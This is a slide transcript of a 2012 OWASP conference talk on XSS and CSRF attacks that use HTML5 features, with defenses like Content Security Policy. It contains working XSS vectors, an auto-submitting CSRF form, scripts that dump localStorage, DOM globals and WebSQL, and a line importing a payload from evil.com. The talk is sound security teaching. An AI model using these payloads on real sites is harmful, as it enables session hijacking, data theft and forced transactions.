SlideShare a Scribd company logo

XSS and CSRF with HTML5

Shreeraj Shah
Shreeraj Shah

This document discusses cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks in HTML5. It begins with an overview of the evolution of HTML and the expansion of the browser attack surface with new technologies. It then covers specific XSS vectors using new HTML5 features like media tags, autofocus attributes, and forms. The document also examines how CSRF can be conducted using HTML5 features like XMLHttpRequests and bypassing the same-origin policy and CORS restrictions. Defense techniques like content security policy headers are also discussed.

Technology
1 of 73
XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP OWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj  Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd.  Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev)  Interest  Web security research  Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.  Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
HTML5 VECTORS – ATTACK SURFACE OWASP 3
HTML5 – Attacks on the rise … Evolution of HTML5  1991 – HTML started (plain and simple)  1996 – CSS & JavaScript (Welcome to world of XSS and browser security)  2000 – XHTML1 (Growing concerns and attacks on browsers)  2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)  2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
Modern Browser Model Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSS Single JavaScript Internet DOM/Page Application XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
CSRF WITH HTML5 OWASP 7
CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
CSRF injection – splitting and forcing … <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"? ><methodCall><methodName>stocks.buy</methodName><params><param ><value><string>MSFT</string></value></param><param><value><double>2 6</double></value></param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 11
CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
XHR – Level 2 powering CSRF XHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/download xhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“ Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
CORS & XHR – ingredients for CSRF Before HTML5 – Cross Domain was not possible through XHR (SOP applicable) HTML5 – allows cross origin calls with XHR-Level 2 calls CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
CORS based HTTP Headers Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
XHR – Stealth POST/GET CSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
Exploiting the use case CORS preflight bypass – certain Content-Type bypass preflight HTTP Forcing cookie replay by “withCredentials” Internal network scanning and tunneling Information harvesting (internal crawling) Stealth browser shell – post XSS (Allow origin- *) Business functionality abuse (upload and binary streams) OWASP 17
CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
CSRF & HTML5 OWASP 21
CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
CSRF & HTML5 OWASP 23
CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
CSRF/Upload - POC OWASP 25
CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
CSRF/Upload OWASP 27
Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
Internal Scan for CORS OWASP 29
Scan and Defend Scan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or not Defense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
XSS WITH HTML5 OWASP 31
XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
HTML5 – Tags/Attributes/Events Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) Attributes – form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
XSS variants Media tags Examples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
XSS variants Exploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
XSS variants Form & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">test Etc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
Scan and Defend Scan and look for Reflected or Persistent XSS spots with HTML5 tags Defense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
CSP in Action – HTML5 defense … Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
Blocking Scripts Content-Security-Policy: script-src 'self‘ Only allowing script from the self Other mechanism 'unsafe-inline' - blocking inline 'unsafe-eval‘ – blocking eval type calls Post XSS defense can be crafted OWASP 39
Controlling Browser connect-src – Controlling WebSocket, XHR etc. frame-src – Source of the frame (ClickJacking) object-src – Flash, Silverlight etc. media-src – controlling audio and video img/style – image and style sources default-src https:; - locking over SSL only OWASP 40
Example  Persistent XSS injected HTTP/1.1 200 OK Date: Wed, 12 Sep 2012 14:40:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-WebKit-CSP: script-src 'self' X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6146 OWASP 41
Storage extraction with XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
Web Storage Extraction Browser has one place to store data – Cookie (limited and replayed) HTML5 – Storage API provided (Local and Session) Can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 43
Web Storage Extraction It is possible to steal them through XSS or via JavaScript Session hijacking – HttpOnly of no use getItem and setItem calls XSS the box and scan through storage OWASP 44
Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } Above code allows all storage variable extraction OWASP 45
File System Storage HTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; It becomes a full blown local system for application in sandbox It empowers application OWASP 46
File System Storage It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); }  App can have full filesystem in place now. OWASP 47
Sensitive information filesystem Assuming app is creating profile on local system OWASP 48
Extraction through XSS Once have an entry point – game over! OWASP 49
Single DOM/One Page App - XSS Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } OWASP 51
Global Sensitive Information Extraction from DOM HTML5 apps running on Single DOM Having several key global variables, objects and array var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjfdvint","t est.com"]; Post DOM based exploitation possible and harvesting all these values. OWASP 52
Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } OWASP 53
Scan and Defend Scan and look for Scanning storage Defense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 56
SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 57
Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
Blind WebSQL Enumeration We will run through all objects and get object where constructor is “Database” We will make Select query directly to sqlite_master database We will grab 1st table leaving webkit table on 0th entry OWASP 59
Blind WebSQL Enumeration OWASP 60
Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
Web Messaging  HTML5 is having new interframe communication system called Web Messaging.  By postMessage() call parent frame/domain can call with the iframe  Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible  worker.webkitPostMessage – faster transferable objects OWASP 62
Web Messaging - Scenario If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked Also, origin is not set to fixed then again frame listen from any domian – again an issue Stream coming needs to be checked before innerHTML or eval() Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
Origin check OWASP 64
Web Worker – Hacks! Web Workers allows threading into HTML pages using JavaScript No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); OWASP 65
Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
Web Worker – Hacks! Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
Web Worker – Hacks!  Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> OWASP 68
Web Workers – Hacks! Possible to cause XSS Running script Passing hidden payload Also, web workers can help in embedding silent running js file and can be controlled. Can be a tool for payload delivery and control within browser framework importScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
Scan and Defend Scan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc. Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
APIs … HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
Resources/References http://www.html5rocks.com/en/ (Solid stuff) https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff) http://html5sec.org/ (Quick Cheat sheet) http://html5security.org/ (Good resources) http://blog.kotowicz.net/ (Interesting work) OWASP 72
http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 73

Recommended

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
API Security : Patterns and Practices
API Security : Patterns and PracticesAPI Security : Patterns and Practices
API Security : Patterns and PracticesPrabath Siriwardena
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 

More Related Content

What's hot

Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Ajin Abraham
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
빠르게훓어보는 Node.js와 Vert.x
빠르게훓어보는 Node.js와 Vert.x빠르게훓어보는 Node.js와 Vert.x
빠르게훓어보는 Node.js와 Vert.xTerry Cho
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration TestersChris Gates
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Bypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsBypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsSuraj Khetani
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 

What's hot (20)

Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
빠르게훓어보는 Node.js와 Vert.x
빠르게훓어보는 Node.js와 Vert.x빠르게훓어보는 Node.js와 Vert.x
빠르게훓어보는 Node.js와 Vert.x
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Dom based xss
Dom based xssDom based xss
Dom based xss
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Bypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsBypassing nac solutions and mitigations
Bypassing nac solutions and mitigations
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 

Similar to XSS and CSRF with HTML5

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web appsJames Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsJames Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionJames Pearce
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web appsJames Pearce
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007ClubHack
 
JClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupJClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupMarakana Inc.
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1James Pearce
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
HTML5: An Overview
HTML5: An OverviewHTML5: An Overview
HTML5: An OverviewNagendra Um
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5James Pearce
 
HTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものHTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものMicrosoft
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Christian Frichot
 
Technology Trends
Technology TrendsTechnology Trends
Technology TrendsHenry Jacob
 

Similar to XSS and CSRF with HTML5 (20)

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
Modern browsers
Modern browsersModern browsers
Modern browsers
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
JClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupJClouds at San Francisco Java User Group
JClouds at San Francisco Java User Group
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
HTML5: An Overview
HTML5: An OverviewHTML5: An Overview
HTML5: An Overview
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
新 · 交互
新 · 交互新 · 交互
新 · 交互
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
